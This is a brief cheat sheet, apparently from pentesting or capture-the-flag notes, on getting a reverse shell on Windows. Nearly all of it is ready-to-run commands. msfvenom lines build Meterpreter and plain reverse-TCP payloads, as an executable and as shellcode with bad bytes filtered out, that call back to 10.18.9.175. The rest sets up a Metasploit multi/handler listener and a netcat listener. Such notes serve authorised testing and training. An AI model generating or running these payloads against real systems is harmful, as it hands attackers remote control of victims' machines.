Skip to content

Windows revers shell

Meterpreter

Shell as exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4442 -f exe -o shell.exe

Shell as shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00\x09\x0a" -f rb EXITFUNC=thread

Listener

msfconsole
msf6 > search multi handler
> 5   exploit/multi/handler
...
msf6 > use 5
msf6 exploit(multi/handler) > set LHOST 10.18.9.175
msf6 exploit(multi/handler) > set LPORT 4442
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

Standard shell

Shell as shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -b "\x00\x09\x0a" -f python EXITFUNC=thread

Listener

netcat -lvnp 4444